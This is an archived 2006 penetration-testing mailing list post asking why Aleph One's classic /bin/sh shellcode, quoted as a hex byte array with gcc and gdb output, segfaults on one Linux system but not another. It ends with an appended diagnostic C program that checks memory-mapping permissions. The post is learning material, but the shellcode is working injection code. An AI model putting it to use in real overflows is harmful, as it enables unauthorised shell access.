Penetration Testing mailing list archives

Shellcode itself segfaults


From: Paul Sebastian Ziegler <psz () observed de>
Date: Mon, 19 Jun 2006 21:06:45 +0200

Hi,

I recently ran into a problem while exploring overflowing mechanisms.
The overflowing itself is working just fine. But now I am at the point
where I want to actually inject code into my test applications, so I
started searching for shellcodes to play with.
Now when I use codes for playing around (e.g. opening the CD drive),
everything works just fine. However, as soon as anything actually invokes
a shell, thus becoming a real "shellcode", the shellcode itself segfaults.

As an example I have used this code contained in the paper "Buffer
Overflows Complete" from http://hackaholic.org :

-------------------------------------------------------------------------------
char main[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
-------------------------------------------------------------------------------

It is the same code that is also used in Aleph1's famous Phrack article
49-14.

Next I compile it successfully:
-------------------------------------------------------------------------------
$ gcc -o sh sh.c
-------------------------------------------------------------------------------

No errors here.

However when trying to run ./sh I get this:

-------------------------------------------------------------------------------
$ ./sh
Speicherzugriffsfehler (Segmentation fault)
-------------------------------------------------------------------------------

I thought of trying to find out what happens here, so I fired up gdb to
check it out:
-------------------------------------------------------------------------------
$ gdb -q sh
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) run
Starting program: /home/tatsumori/exp/sh
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
(gdb) backtrace
#0  0x00949e20 in __libc_start_main () from /lib/tls/libc.so.6
#1  0x080482ad in _start ()
(gdb) info reg
eax            0xa5e17c 10871164
ecx            0xbff2163c       -1074653636
edx            0x1      1
ebx            0xa5bff4 10862580
esp            0xbff215b0       0xbff215b0
ebp            0xbff21608       0xbff21608
esi            0xbff21634       -1074653644
edi            0xbff215c0       -1074653760
eip            0x949e20 0x949e20
eflags         0x10246  66118
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb)
---------------------------------------------------------------------------------

Ok, so libc seems to be canceling my code here.
This was tested on a Fedora Core 3 machine:
Linux version 2.6.11-1.14_FC3 (bhcompile () bugs build redhat com) (gcc
version 3.4.3 20050227 (Red Hat 3.4.3-22)) #1 Thu Apr 7 19:23:49 EDT
2005

I also tested it on my gentoo-box with ssp and pie.
Here it is impossible to actually smash the stack, however the shellcode
itself works.

---------------------------------------------------------------------------------
% gcc -o sh sh.c
% ./sh
sh-3.1$ exit
---------------------------------------------------------------------------------

Linux version 2.6.16-hardened-r6r4h (root@localhost) (gcc バージョン
3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)) #10 PREEMPT Wed Jun
14 23:09:30 CEST 2006

However this is only true as long as I don't use setuid-code. Once I do
this I get exactly the same segfault on this box too.


I got the feeling that this is some kind of (maybe too) well known
standard problem, so I tried Google. However, the only keywords I could
come up with (e.g. "shellcode setuid segfault") are contained in every
single overflowing paper, so I got 100,000+ results with the first 300
being tutorials that didn't contain anything useful for me.


I would greatly appreciate it if someone could tell me what is going on
here. Or maybe give me the name/URL of some paper handling this or
giving me the right keyword to search for myself.


Thanks a lot in advance!

Kind regards,
Paul
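Added example (not from the post or the paper it quotes): before blaming libc for a crash like the one above, a useful check is whether the bytes being jumped to live in a mapping that is executable at all, since on kernels with NX or Exec-Shield enforcement a jump into a writable data segment (which is where a global `char[]` ends up) faults immediately. The program below, which assumes `/proc/self/maps` is readable, finds the mapping that holds a given address and reports its permission bits; the `data_bytes` array it inspects is a constructed placeholder, not the shellcode from the post.

```c
/* Added example: look up the /proc/self/maps entry that contains a given
 * address and report its permission field, so you can see whether a
 * region is r-xp (code) or rw-p (data) before anything tries to execute
 * from it. Assumes a Linux system with /proc mounted. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Constructed stand-in for data-resident bytes: a global char array,
 * which the linker places in the writable data segment. It holds
 * harmless text and is never executed here. */
char data_bytes[] = "not executed";

/* Find the mapping containing addr. On success copies the 4-char
 * permission field (e.g. "r-xp") into perms and returns 0. Returns -1
 * if /proc/self/maps cannot be read or no mapping contains addr. */
int region_perms(const void *addr, char perms[5]) {
    FILE *f = fopen("/proc/self/maps", "r");
    char line[512];
    uintptr_t a = (uintptr_t)addr;
    if (!f) return -1;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char p[5];
        /* Each line starts "lo-hi perms ..." with hex bounds. */
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, p) != 3) continue;
        if (a >= lo && a < hi) {
            memcpy(perms, p, 5);
            fclose(f);
            return 0;
        }
    }
    fclose(f);
    return -1;
}

/* 1 if the mapping holding addr is executable, 0 if it is not,
 * -1 if that cannot be determined. */
int is_executable(const void *addr) {
    char perms[5];
    if (region_perms(addr, perms) != 0) return -1;
    return perms[2] == 'x';
}

int main(void) {
    char perms[5];
    if (region_perms(data_bytes, perms) == 0)
        printf("data_bytes lives in a %s mapping\n", perms);
    if (region_perms((const void *)region_perms, perms) == 0)
        printf("region_perms lives in a %s mapping\n", perms);
    return 0;
}
```

On a system that enforces non-executable data the first line reports `rw-p` and the second `r-xp`, which is exactly the difference between the working CD-drive payload location and a jump into a data array.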
